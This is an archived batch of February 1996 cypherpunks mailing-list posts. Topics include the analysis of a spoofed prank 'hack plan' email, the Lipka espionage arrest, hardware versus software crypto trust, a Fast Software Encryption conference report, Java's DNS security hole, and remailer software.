   ip81.la.ca.interramp.com the first time I tried a 
   traceroute. The second time it showed up as 
   ip81.syracuse.ny.interramp.com. In any case, traceroute
   went recursive between los-angeles.ca.isdn.psi.net
   (38.145.221.110) and lan.losangeles.ca.psi.net
   (38.145.221.1). This indicates the target could not be
   reached - perhaps it's a PPP address, or disconnected.
3. There is an X-Sender: (Unverified) header entry. So the
   mail was SMTP faked without the HELO protocol.
4. The error purpoting to originate from mailer-daemon@anon.com
   says the mail was addressed to PeppermintPty@loacst.org. loacst.org
   is not a registered domain.
5. PeppermintPty is obviously Peppermint Patty; the "original message"
   is signed Marcie. Peanut fans will recognise these characters.

So - what was it all about? An elaborate prank? A convoluted NSA
plot? I would lean towards the first, but perhaps we'll know
on March 1st, the date to "gain access to target".

Rishab
ps. the copy I received follows:

>From mailer-daemon@anon.com  Fri Feb 23 20:08:00 1996
Received: from m-net148.arbornet.org (m-net.arbornet.org [148.59.250.2]) by shellx.best.com (8.6.12/8.6.5) with SMTP id UAA20969 for <rishab@best.com>; Fri, 23 Feb 1996 20:07:44 -0800
Received: from smtp1.interramp.com by m-net148.arbornet.org with smtp
        (Smail3.1.29.1 #4) id m0tqBGv-0009SHC; Fri, 23 Feb 96 23:07 WET
Received: from [38.10.221.81] by smtp1.interramp.com (8.6.12/SMI-4.1.3-PSI-irsmtp)
        id XAA24970; Fri, 23 Feb 1996 23:06:42 -0500
X-Sender:  (Unverified)
Message-Id: <v01520db9ad53979e9858@[38.10.221.81]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Fri, 23 Feb 1996 08:11:33 -0800
To: (Recipient list suppressed)
From: mailer-daemon@anon.com (System Mail Manager)
Subject: Twelve Days of Christmas
Status: RO


-- <System Report> --
UNDELIVERABLE MAIL: Unknown Host("PeppermintPty@loacst.org")
UNDELIVERABLE MAIL: Bad Key

-- <Original Message Follows> --

*** TOP LEVEL: DESTROY IMMEDIATELY UPON READING ***
*** DO NOT PRINT OR SAVE. Code1.8 Table2Hex6    ***

DAY 10: DR. BLACK located a promising entry point at the target site. DR.
BLACK recovered four of the six password tokens before his position was
compromised. DR. BLACK will be replaced by DR. ORANGE.

Estimated time to recover the remaining two password tokens and gain access
to target: EIGHT DAYS (03.01.96)

Confidence is HIGH.

My team has been working around the clock for a month now. Please tell your
people to be more tolerant. Yelling doesn't help anything.

Marcie









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 26 Feb 1996 00:41:25 +0800
To: John Young <jya@pipeline.com>
Subject: Re: TED_hal
In-Reply-To: <199602251539.KAA17780@pipe1.nyc.pipeline.com>
Message-ID: <Pine.SOL.3.91.960225111330.18561F-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 25 Feb 1996, John Young wrote:

>    2-25-96.
> 
>    (With Hall, it's worth wondering if this ancient revelation
>    and the recent 20-year-old NSA-spy have anything to do
>    with the future of IC budgets -- teasing release of "if you
>    knew what we know.")
> 

Lipke's neighbors indicate his income didn't match his lifestyle.

FINCEN at work?

bd





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 26 Feb 1996 02:38:53 +0800
To: cypherpunks@toad.com
Subject: Re: TED_hal
Message-ID: <ad55e77b06021004885a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:17 PM 2/25/96, Brad Dolan wrote:

>Lipke's neighbors indicate his income didn't match his lifestyle.
>
>FINCEN at work?

I'm skeptical.

How would Lipka's neighbors know what his "income" is, unless he told them?
(My neighbors don't have any idea what my income is, for example.) Sounds
like typical bullshit by neigbors, saying they knew something was
"suspicious" (always after the fact, it seems).

Also, all indications so far revealed are that Lipka was only paid by the
Sovs in the mid-to-late 60s. And then only, according to released
information, something like $500 to $1000 per dead drop, about once a
month. Hardly a huge sum, even back then. Even if he invested this, which
is unlikely, how would his neighbors know if this was part of his "income"
or not?

Sounds more like, "Yeah, we knew there was something strange about him,"
which about half of all neigbors say about arrested fugitives in their
midst. (The other half saying, "But he was a really nice guy.")

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Mon, 26 Feb 1996 01:10:12 +0800
To: cypherpunks@toad.com
Subject: Encryption Chips
Message-ID: <960225114724.20210a61@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


>	Faking crypto chips for public algorithims is theoretically
>more difficult, because its simple to create a DES_verify routine to make
>sure your DES chip is working right.

a) chips do not need makeup
b) t'were me, I would just fix the chip so that instead of 2^56 (DES) keys
   or whatever, the PRNG was "fixed" so that the total keyspace was only 2^32
   for instance. Enough to be nearly impossible to check but small enough
   for a brute force engine to zip through in seconds *if you knew the 
   algorithm*.

The nice thing about am implimentation in software is that the code can be 
examined for just this sort of thing *on a randomly selected operating unit*.
- hard to do with a chip.
						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 26 Feb 1996 02:58:05 +0800
To: cypherpunks@toad.com
Subject: Re: Encryption Chips
Message-ID: <ad55e9bf07021004108c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:47 PM 2/25/96, "A. Padgett Peterson P.E. Information Security"

>The nice thing about am implimentation in software is that the code can be
>examined for just this sort of thing *on a randomly selected operating unit*.
>- hard to do with a chip.

But of course one's compiler may have been subverted, as Ken Thompson
showed some years back. Software implementations are sensitive to different
sorts of attacks than hardware implementations are.

Me. I don't have any hardware crypto chips at all, and think it unlikely I
will in the next several years. So I use only software crypto
implementations. And I admit to not having verified that my copy of MacPGP
is the same one now at the various sites...I figure that if the NSA has
pulled a blag bag job on me and replaced my MacPGP with a special version
that I've got other problems to worry about!

Your mileage may vary. If I were responsible for crypto for large financial
transactions, I'd have a different set of worries.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "B. Schneier" <bs208@newton.cam.ac.uk>
Date: Sun, 25 Feb 1996 20:11:56 +0800
To: cypherpunks@toad.com
Subject: Report from Fast Software Encryption Conference
Message-ID: <199602251153.GAA05973@gibbs.newton.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


*************************************************************************
This is a temporary e-mail address; I am in Cambridge until 12 March.
Continue to send mail to schneier@counterpane.com; it forwards by itself.
*************************************************************************

	Report on the Third International Workshop on FAST
	SOFTWARE ENCRYPTION, Cambridge University, UK, Feb 96


The conference was held at the Isaac Newton Institute for
Mathemtical Science, and was attended by about 45 people.  What
follows is a short description of some, but not all, of the talks.

There were two papers analyzing safer: "Truncated Differentials
of SAFER" by Knudsen and Berson, and "The PHT of SAFER" by Murphy.
Unfortunately, only the first paper appears in the proceedings.
The attacks work on SAFER with 5 rounds or less, and not on SAFER
with the new key schedule suggested at Crypto '95.

Vaudenay presented his attack on Blowfish, which expoloits weak
keys that result in two S-box entries being identical.  In a weak
Blowfish variant where the S-boxes are known, his attack can break
8-round Blowfish efficiently but does not work against the full
16-round version.  If the S-boxes are secret, as they are in
Blowfish, his attack can detect these weak keys in the 8-round
variant but not in the 16-round variant.

Blaze presented a really clever protocol for encrypting with a
low-bandwidth smartcard.  The idea is that the host computer is
trusted with the plaintext but not the key, and the secure smartcard
is too slow to do bulk encryption.  He presents a protocol where the
host does all the work but does not learn the key.

Dobbertin presented a beautiful paper where he cryptanalyzed MD4,
extending the work he did cryptanalyzing RIPE-MD.  Attendees took 
bets on when MD5 will fall to this sort of attack.

There were several new algorithms presented.  RIPEMD-160 is a
strengthened version of RIPE-MD, designed by Dobbertin, Bosselaers,
and Preneel.  ISAAC is a steam cipher by Bob Jenkins.  Tiger is a
one-way hash function by Anderson and Biham designed to work efficently
on 64-bit computers.  Shark is a block cipher, similar in design to
SAFER, by Rijmen, Daemen, Preneel, Bosselaers, and De Win.  And there
were two Luby-Rackoff-like constructions that make block ciphers of
arbitrary block size out of stream ciphers and one-way hash functions
by Anderson and Biham, called Bear and Lion.  Another paper by Lucks
showed how to spead up Luby-Rackoff's block cipher.  Matsui presented
some work on block cipher designs provably secure against differential
and linear cryptanalysis, but not the specific construction that is the
MISTY algorithm.

Kelsey and Schneier presented a paper on unbalanced Feistel networks.
Called UFNs, these are Feistel networks where the two sides are of
unequal size.  Examples of this construction includes MD4, RC2, 
MacGuffin, S1, and REDOC III.  We gave some general analysis of 
different constructions.

There were two papers on correlation attacks on stream ciphers, and one
paper by Golic on nonlinear filter generators.
	
The proceedings have been published by Springer-Verlag in their
Lecture Notes in Computer Science series, #1039.  The editor
of the volume is Dieter Gollmann, and the ISBN is 3-540-60865-6.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 26 Feb 1996 01:33:48 +0800
To: cypherpunks@toad.com
Subject: WYZ_qak
Message-ID: <199602251706.MAA17180@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-25-96. TWP:

   "Scrambling for a Policy on Encryption Exports. As
   Technology Advances, U.S. and Industry Seek Compromise That
   Balances Public, Private Fears."

   A knowledgeable brief by Elizabeth Corcoran, with quotes by
   wisecracking Crypto-Wise-Quackers.

   WYZ_qak







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 26 Feb 1996 01:53:37 +0800
To: cypherpunks@toad.com
Subject: Extra
Message-ID: <199602251720.MAA18096@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The recent study by Blaze, Diffie, Shimomura, et al, of stunted 
cryptography is featured in the TWP story on crypto exports 
offered with WYZ_qak.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
Date: Mon, 26 Feb 1996 05:14:25 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunks vs. Coderpunks
Message-ID: <2.2.32.19960225174116.005d16a8@opus.SanDiegoCA.ATTGIS.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:49 PM 2/24/96 GMT, attila wrote:
>** Reply to note from Perry E. Metzger <perry@piermont.com> 02/13/96
1:29pm -0500
>
>  [snip] 
>= The thing that makes Cypherpunks worthwhile is that its a place where
>= you could, once, get news updates about GAK, information on the latest
>= research into cryptography, organize mass key crackings, discuss APIs,
>= talk a bit about the politics of cryptography, etc.
>= 
>    sounds like we're having the sme problems as "democracy" --it soon
becomes  
>irrelevant!  example:
>
>	I was out of town for 6 days: I returned to find 1056 messages in the sorted 
>    mailbox!  yes: 1056 messages which it took close to an hour to delete
almost 800 
>    of them as irrelevant. some you can discard automatically depending on the 
>    author, some by content, etc. but I agree: it is clutter.

   I spend most of my time here as a lurker but I must chime in now. :)

  I filter to an unread area and then try to read once per week.  I know
that I trim off good articles while trying to trim the fat off.  If you
can't exercise restraint, how about putting "junk" as the first word in your
subject.  

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  7E BF 38 3F 24 A7 D1 B0  54 44 96 AA 10 D0 5D 51
Avail on Pub Key server.
PGP-encrypted e-mail welcome!
Dreams.  They are just a "screen saver" for the brain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Mon, 26 Feb 1996 05:35:37 +0800
To: cypherpunks@toad.com
Subject: Re: DNS-related problem, and, motherhood 'n apple pie, etc
Message-ID: <199602252053.MAA25480@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I hope people evaluate Java (and all software) based on technical issues, 
and not based on whether or not you think I'm clueless, brain damanged or 
a liar. 

We take the DNS-related problem very seriously; we do understand how DNS
works (I did say "apologies for the oversimplifiation"); we never have put
our heads in the sand.  I do think it's a bit unfair to the Java team to
say we put our heads in the sand, since we are deliberately trying to be
as open and honest and forthcoming as we can.  I mean, we are publishing
full source code, which I'm not sure is the case for lots of software that
people place a lot of trust in, implicitly or explicitly. 

As I've said every time I've said anything, every time security awareness
on the net is raised, I think it's good for the net.  I personally don't
regard the internet as secure, and any information I care about I have
encrypted on disk.  Any information I really, really care about I don't
even have on the internet.  I do regular backups.  I'm not saying this is
what everyone has to do.  But it's not that hard or time-consuming, and it
wouldn't hurt.  But people who are in charge of corporate security for
their company, or people who have very sensitive or very valuable
information on their disks, should consider the many ways that the internt
is insecure, not just how some applet could be exploited. 

Having said that, does that imply that I think it's OK for a Java
application to have security holes?  Of course not!  I hope we can use
Java-the-language to build more secure systems than we've gotten used to
surviving in the past.  Does that mean I'm downplaying the importance or
seriousness of any applet-related hole?  Of course not!  I think it's
possible simultaneously to understand the seriousness of a security hole,
AND still to say it's a good idea for people to practice safe internet. 

Marianne Mueller
I work for Sun, on the Java team. 
mrm@netcom.com
mrm@eng.sun.com
http://java.sun.com/people/mrm/









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 26 Feb 1996 06:02:23 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Protest!
Message-ID: <199602252130.NAA16836@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:13 AM 2/23/96 -0600, m5@dev.tivoli.com (Mike McNally) wrote:
>  Is anybody so seriously delusional
>that they imagine poor Bill Clinton having to work his way through all
>the mail with elm?

It's really not that tough -
        g/Bill Of Rights/d

They're already about half done .....

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Grantham <casper@optima.mme.wsu.edu>
Date: Mon, 26 Feb 1996 06:21:38 +0800
To: "'Thaddeus J. Beier'" <thad@hammerhead.com>
Subject: PGP
Message-ID: <01BB0387.E234CCC0@xtsd0108.it.wsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


R U aware of a PGP mailing list?

Chris

P.S. How do I attach a sig to a Microsoft Exchange message?

FOR BEST SECURITY -STEAM ALL PGP MESSAGES!

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzEvXtUAAAEEALtwrsq7zqQdTDRRpgJeCXYCuA6M49Yp93IE3ScaMwPPi297
EIEbpSyv3ZB9UBjTNHcsPADhfwDs8/yBS4SWW+NF1BwnRLUbNpZ5E6BGxGojQnF4
yC5MKNIuxDgY8FYYpsXWpxWIOJZOf5LY6E4BhZ9fGK/MfuhSvUFD9HN4zM2hAAUR
tC1DaHJpcyBXLiBHcmFudGhhbSA8Y2FzcGVyQG9wdGltYS5tbWUud3N1LmVkdT4=
=xznQ
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 26 Feb 1996 04:31:02 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: TED_hal
In-Reply-To: <ad55e77b06021004885a@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.960225144842.3206A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 25 Feb 1996, Timothy C. May wrote:

> At 4:17 PM 2/25/96, Brad Dolan wrote:
> 
> >Lipke's neighbors indicate his income didn't match his lifestyle.
> >
> >FINCEN at work?
> 
> I'm skeptical.
> 
> How would Lipka's neighbors know what his "income" is, unless he told them?
> (My neighbors don't have any idea what my income is, for example.) Sounds
> like typical bullshit by neigbors, saying they knew something was
> "suspicious" (always after the fact, it seems).

Could be.  That's what they said, anyway.  See below.

But if I had the FINCEN databases, I would spend my idle hours looking 
for statistical anomalies.  Like guys whose outgo exceeds reported income.

bd

(Associated Press, 2/23/96)
 
Lipka's Neighbors Had Wonders

   MILLERSVILLE, Pa. (AP) -- To his neighbors, Robert Stephan Lipka was a coin
collector, chess player and off-track betting enthusiast who lived on
disability payments.  [...]

[...]

On Friday, federal agents converged on his one-story brick colonial house in
this rural central Pennsylvania town and arrested Lipka. He was charged with
selling secrets to the Soviets for nearly 10 years. 
   
Authorities said he passed documents to the Soviets during the Vietnam War
when he was an Army clerk at the Pentagon's National Security Agency at Fort
Meade, Md., sometimes getting up to $1,000 for each delivery of information. 
[...]

Bewildered neighbors watched as federal agents walked in and out of the
house Friday morning. A garbage crew stopped to pick up the family trash, only
to open the lid of an empty can, the contents apparently taken already by
authorities. 

Neighbor James Quinn said there had been some speculation in the
neighborhood how about the Lipkas could afford the $168,000 house they bought a
year ago. Lipka sold his former house only two months ago, for $76,000. 

[...]







> 
> Also, all indications so far revealed are that Lipka was only paid by the
> Sovs in the mid-to-late 60s. And then only, according to released
> information, something like $500 to $1000 per dead drop, about once a
> month. Hardly a huge sum, even back then. Even if he invested this, which
> is unlikely, how would his neighbors know if this was part of his "income"
> or not?
> 
> Sounds more like, "Yeah, we knew there was something strange about him,"
> which about half of all neigbors say about arrested fugitives in their
> midst. (The other half saying, "But he was a really nice guy.")
> 
> --Tim
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^756839 - 1  | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Mon, 26 Feb 1996 04:48:10 +0800
To: cypherpunks@toad.com
Subject: WinSock Remailer
Message-ID: <199602252025.PAA13300@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


C-punks:

You can now check out the features of the WinSock 
Remailer at:

  http://www.c2.org/~winsock/

The remailer is now scheduled to be operational 
about March 21, 1996.  After a one month alpha test, the
executable will be available for download for beta
testing by anyone who wants to run a remailer.

Regards,

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 26 Feb 1996 05:00:08 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: mismaster
Message-ID: <Pine.SUN.3.91.960225153301.13711A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



Where is the latest version of mixmaster available?

I can't seem to get hold of obscura for lance's homepage and 
     * http://nately.ucsd.edu/~loki/
     * ftp://nately.ucsd.edu/pub/remail/
seem to be down.

Any ideas?



---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Grantham <casper@optima.mme.wsu.edu>
Date: Mon, 26 Feb 1996 08:28:32 +0800
To: "'Cypherpunks'" <cypherpunks@toad.com>
Subject: RE: PGP
Message-ID: <01BB0399.29EB80C0@xtsd0108.it.wsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, that wasn't suppose to be sent there too.
Chris

----------
From: 	Chris Grantham[SMTP:casper@optima.mme.wsu.edu]
Sent: 	Sunday, February 25, 1996 1:38 PM
To: 	'Thaddeus J. Beier'
Cc: 	'Cypherpunks'
Subject: 	PGP

R U aware of a PGP mailing list?

Chris

P.S. How do I attach a sig to a Microsoft Exchange message?

FOR BEST SECURITY -STEAM ALL PGP MESSAGES!

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzEvXtUAAAEEALtwrsq7zqQdTDRRpgJeCXYCuA6M49Yp93IE3ScaMwPPi297
EIEbpSyv3ZB9UBjTNHcsPADhfwDs8/yBS4SWW+NF1BwnRLUbNpZ5E6BGxGojQnF4
yC5MKNIuxDgY8FYYpsXWpxWIOJZOf5LY6E4BhZ9fGK/MfuhSvUFD9HN4zM2hAAUR
tC1DaHJpcyBXLiBHcmFudGhhbSA8Y2FzcGVyQG9wdGltYS5tbWUud3N1LmVkdT4=
=xznQ
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 26 Feb 1996 05:36:38 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: mismaster
In-Reply-To: <Pine.SUN.3.91.960225153301.13711A-100000@polaris.mindport.net>
Message-ID: <199602252056.PAA23310@homeport.org>
MIME-Version: 1.0
Content-Type: text


Black Unicorn wrote:
| 
| Where is the latest version of mixmaster available?

utopia.hacktic.nl/pub/replay/pub/remailer/Mix.2.0.3.tar.gz

Also, check out my mixmaster install script. Mail me a message with
'get mix-installer' in the subject.  Guaranteed to work, or double
your money back. :)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Mon, 26 Feb 1996 05:52:22 +0800
To: cypherpunks@toad.com
Subject: Re: Internet shutdown Feb 29?
Message-ID: <ad567e9300021004c463@[18.162.1.1]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>This looks completely, totally, and insanely bogus, but I
>need some kind of verification for this bizarre little
>piece of mail that somehow ended up in my mailbox.
>
>Anybody from MIT ever heard of "Kim Dereksen"?

Yeah, from several of ISP's and others (including one un-named government
organization that wanted to FAX us the message, for security reasons,
didn't want to send it over the network).

Of course the message is Bogus... it wasn't even e-mailed from MIT (nor did
the author try to make it look so).

                                -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTDOksUtR20Nv5BtAQEoUwP/QYtgsYDnzjv/usaBax+pXX3glYLpewMO
Fi/cQN5840YigQpA/3klyptyEtA9sj2Vd3CYvGfj0KYqZfRG1mSKecURRBHE7kzq
hB2o4fter8Pjp+3bW3APb6DsrCvlkmYcnR+QYBN8oikKkv1+cGYvHl7w6x3LJiiU
U5BLXiPc2s0=
=98q4
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 26 Feb 1996 08:31:10 +0800
To: sameer <jsw@netscape.com
Subject: Re: REM_ote
Message-ID: <199602260003.QAA01640@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:17 AM 2/24/96 -0800, sameer wrote:
>> about your browsing habits.  Of course we have never done this, but if we
>> were "phoning home" periodically to check for new releases it might raise
>> some suspicion among the more paranoid.
>> 
>>   I guess we could make it an option...
>
>        I don't think you need to "phone home". Just make it happen
>whenever someone hits the Netscape web site. some monstrous percentage
>of Netscape users haven't changed the default home page, and even
>those who have do go to the Netscape page every now and then.

I will point out that we are already trusting our copy of the Netscape
browser not to abuse its knowledge of our browsing habits.  The best we can
do to assure that our trust is not misplaced is monitor its communications,
and if it is encrypting, we can't even do that.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pierre Bourque <pierre@dragon.achilles.net>
Date: Mon, 26 Feb 1996 06:00:48 +0800
To: Rishab Aiyer Ghosh <rishab@best.com>
Subject: Re: Hack attempt? "12 days" from anon.com
In-Reply-To: <199602251845.KAA09031@shellx.best.com>
Message-ID: <Pine.SUN.3.91.960225162014.29825A-100000@dragon.achilles.net>
MIME-Version: 1.0
Content-Type: text/plain


Are they trying to access Snoopy's doghouse ?

Pierre Bourque
Mercenary Scribbler
SurfBoard: here
And on the Left Coast: pierre@well.com



On Sun, 25 Feb 1996, Rishab Aiyer Ghosh wrote:

> 
> Regarding the mysterious mail from mailer-daemon@anon.com
> that many people have received:
> 1. The mail was apparently sent by a daemon bouncing
>    an undeliverable mail. anon.com is a "virtual domain"
>    hosted at io.com, so it's unlikely that the daemon would
>    have an anon.com address. 
> 2. Headers show it was routed through 38.10.221.81 and
>    smtp1.interramp.com. That IP address showed up as
>    ip81.la.ca.interramp.com the first time I tried a 
>    traceroute. The second time it showed up as 
>    ip81.syracuse.ny.interramp.com. In any case, traceroute
>    went recursive between los-angeles.ca.isdn.psi.net
>    (38.145.221.110) and lan.losangeles.ca.psi.net
>    (38.145.221.1). This indicates the target could not be
>    reached - perhaps it's a PPP address, or disconnected.
> 3. There is an X-Sender: (Unverified) header entry. So the
>    mail was SMTP faked without the HELO protocol.
> 4. The error purpoting to originate from mailer-daemon@anon.com
>    says the mail was addressed to PeppermintPty@loacst.org. loacst.org
>    is not a registered domain.
> 5. PeppermintPty is obviously Peppermint Patty; the "original message"
>    is signed Marcie. Peanut fans will recognise these characters.
> 
> So - what was it all about? An elaborate prank? A convoluted NSA
> plot? I would lean towards the first, but perhaps we'll know
> on March 1st, the date to "gain access to target".
> 
> Rishab
> ps. the copy I received follows:
> 
> >From mailer-daemon@anon.com  Fri Feb 23 20:08:00 1996
> Received: from m-net148.arbornet.org (m-net.arbornet.org [148.59.250.2]) by shellx.best.com (8.6.12/8.6.5) with SMTP id UAA20969 for <rishab@best.com>; Fri, 23 Feb 1996 20:07:44 -0800
> Received: from smtp1.interramp.com by m-net148.arbornet.org with smtp
>         (Smail3.1.29.1 #4) id m0tqBGv-0009SHC; Fri, 23 Feb 96 23:07 WET
> Received: from [38.10.221.81] by smtp1.interramp.com (8.6.12/SMI-4.1.3-PSI-irsmtp)
>         id XAA24970; Fri, 23 Feb 1996 23:06:42 -0500
> X-Sender:  (Unverified)
> Message-Id: <v01520db9ad53979e9858@[38.10.221.81]>
> Mime-Version: 1.0
> Content-Type: text/plain; charset="us-ascii"
> Date: Fri, 23 Feb 1996 08:11:33 -0800
> To: (Recipient list suppressed)
> From: mailer-daemon@anon.com (System Mail Manager)
> Subject: Twelve Days of Christmas
> Status: RO
> 
> 
> -- <System Report> --
> UNDELIVERABLE MAIL: Unknown Host("PeppermintPty@loacst.org")
> UNDELIVERABLE MAIL: Bad Key
> 
> -- <Original Message Follows> --
> 
> *** TOP LEVEL: DESTROY IMMEDIATELY UPON READING ***
> *** DO NOT PRINT OR SAVE. Code1.8 Table2Hex6    ***
> 
> DAY 10: DR. BLACK located a promising entry point at the target site. DR.
> BLACK recovered four of the six password tokens before his position was
> compromised. DR. BLACK will be replaced by DR. ORANGE.
> 
> Estimated time to recover the remaining two password tokens and gain access
> to target: EIGHT DAYS (03.01.96)
> 
> Confidence is HIGH.
> 
> My team has been working around the clock for a month now. Please tell your
> people to be more tolerant. Yelling doesn't help anything.
> 
> Marcie
> 
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 26 Feb 1996 07:16:04 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunks vs. Coderpunks
Message-ID: <ad56290a09021004f04e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:41 PM 2/25/96, Chris Claborne wrote:

>  I filter to an unread area and then try to read once per week.  I know
>that I trim off good articles while trying to trim the fat off.  If you
>can't exercise restraint, how about putting "junk" as the first word in your
>subject.

Ah, but where was the "junk" as the first word of your post?

You see, therein lies the reason these labelling schemes almost never work.
Few people think there own stuff is "junk," else presumably they wouldn't
post it. You can bet your bottom e-dollar that Jim Bell won't label his
posts about assassination politics or nuclear bomb high explosive triggers
as "junk." Nor that I will label my own stuff as "junk."

About like asking people to label themselves as "turkeys" just so we can
deal with crowds better.

Frankly, I think we waste more time arguing about how to improve the
"signal to noise ratio," ephemeral a concept at this is, than it takes to
simply delete posts each of us various dislikes.

The notion that we can "nudge" other people into only posting the kinds of
articles we all want to see is flawed: there is no single type of good
article, and one man's "junk" is another man's "gold."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
